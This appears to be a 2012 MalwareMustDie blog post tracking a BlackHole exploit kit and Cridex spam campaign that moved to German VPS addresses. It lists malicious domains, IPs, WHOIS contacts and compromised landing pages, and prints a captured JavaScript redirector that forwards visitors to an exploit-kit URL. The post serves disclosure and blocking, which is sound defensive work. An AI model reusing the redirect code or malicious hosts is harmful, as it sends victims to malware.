Update: The BHEK Users of Trojan Password Stealer BadActors is Shifting Their Evil Service into Germany VPS at AS25074 (SECURENETZ-DE)
12 Dec 2012
We our past three incident Spam to BlackHole(BHEK) Trojan Cridex (see below url's posts)http://malwaremustdie.blogspot.jp/2012/11/full-disclosure-analysis-fake-facebook.html
http://malwaremustdie.blogspot.jp/2012/12/spam-wordpress-redirector.html
http://malwaremustdie.blogspot.jp/2012/12/fake-facebook-notification-leads-to.html
Was conducted by a CyberCrime Group with the evil DNS service exposed below:
We just spotted these criminals are continuing infection & moving their
Blackhole2 Infector service into the Germany VPS: SECURENETZ-DE ,
as per details below: [PLEASE BLACKLIST THESE!]ganiopatia.ru A 212.162.52.180
pelamutrika.ru A 212.162.52.180
aliamognoa.ru A 212.162.52.180
ahiontota.ru A 212.162.52.180
anifkailood.ru A 212.162.52.180
genevaonline.ru A 212.162.52.180
podarunoki.ru A 212.162.52.180
aseniakrol.ru A 212.162.52.180
pitoniamason.ru A 212.162.52.180
dimarikanko.ru A 212.162.52.180
ganiopatia.ru A 212.162.56.210
pelamutrika.ru A 212.162.56.210
aliamognoa.ru A 212.162.56.210
ahiontota.ru A 212.162.56.210
anifkailood.ru A 212.162.56.210
genevaonline.ru A 212.162.56.210
podarunoki.ru A 212.162.56.210
aseniakrol.ru A 212.162.56.210
pitoniamason.ru A 212.162.56.210
dimarikanko.ru A 212.162.56.210
ahiontota.ru A 212.162.13.230 NEW DOMAINS in NEW VPS IP ADDRESS
anifkailood.ru A 212.162.13.230
podarunoki.ru A 212.162.13.230
aseniakrol.ru A 212.162.13.230
pitoniamason.ru A 212.162.13.230
amnaosogo.ru A 212.162.13.230
dimarikanko.ru A 212.162.13.230
aofngppahgor.ru A 212.162.13.230 ←NEW DOMAIN [aofngppahgor.ru]
With the below WHOIS details:Conrad of Dynamoo blog is also have same reference of these new service (grep IP of 212.162.*) -->>[HERE]
inetnum: 212.162.56.0 - 212.162.57.255
netname: SECURENETZ-DE
descr: Secure-Netz
country: de
admin-c: NK1733-RIPE
tech-c: MATT69-RIPE
status: ASSIGNED PA
remarks: all abuse reports to [email protected]
mnt-by: LEVEL3-MNT
mnt-lower: LEVEL3-MNT
source: RIPE # Filtered
person: Matthew Duncalf
address: Level (3) Communications
address: Level 3 House
address: 66 Prescot Street
address: London, E1 8HG UK
phone: +44 20 7961 8468
fax-no: +44 20 7864 0338
nic-hdl: MATT69-RIPE
mnt-by: LEVEL3-MNT
source: RIPE # Filtered
person: Nicole Kuehne
address: Secure-Netz
address: Am Plan 1
address: 37581 Bad Gandersheim
address: Germany
phone: +49 5382 953600
fax-no: +49 5382 953610
nic-hdl: NK1733-RIPE
mnt-by: LEVEL3-MNT
source: RIPE # FilteredSpam Infector Redirection URL List
Below is the PoC by the spam emails infected url infector landing pages:h00p://www.jiaenhospital.com/mail.htm h00p://www.brsams.com/mail.htm h00p://sat-tesero.it/mail.htm h00p://mondoimmobiliare2010.com/mail.htm h00p://www.fevaweb.org.ar/mail.htm h00p://www.sddongrun.com/mail.htm h00p://revolverresine.com/mail.htm h00p://www.freemusicdownloads.eu/mail.htm h00p://www.migar.cn/mail.htm h00p://www.sp3zory.webd.pl/mail.htm h00p://www.vyborpodarka.ru/mail.htm h00p://latinchat.ca/mail.htm h00p://www.templodoaprendiz.com.br/mail.htm h00p://haxlzxs.com/mail.htm h00p://azlj365.com/mail.htm h00p://modaencuba.com/mail.htm h00p://naohide.com/mail.htm h00p://ulbakompleks.kz/mail.htm h00p://www.freelink.com.cn/mail.htm h00p://www.appchat.cn/mail.htm h00p://www.abbeyhealthcare.co.uk/mail.htm h00p://www.kaizer.cn/mail.htm h00p://www.lkedu8.com/mail.htm h00p://www.institutogv.com.ar/mail.htm h00p://mekka-digital.hu/mail.htm :Log:$ dateI hope the authority will shutdown their domains & DNS soon, for these criminals - are VERY eager to steal credentials from innocent in daily basis. For the Secure-Netz,De, please help to shutdown the usage of these domains under - your VPS immediately.
Wed Dec 12 20:00:40 JST 2012
$ Xurl h00p://www.jiaenhospital.com/mail.htm|less
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 422 100 422 0 0 88 0 0:00:04 0:00:04 --:--:-- 133
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aseniakrol.ru:8080/forum/links/column.php";}
</script>
</body>
</html>
$ host -ta aseniakrol.ru
aseniakrol.ru has address 212.162.52.180
aseniakrol.ru has address 212.162.56.210
.
#MalwareMustDie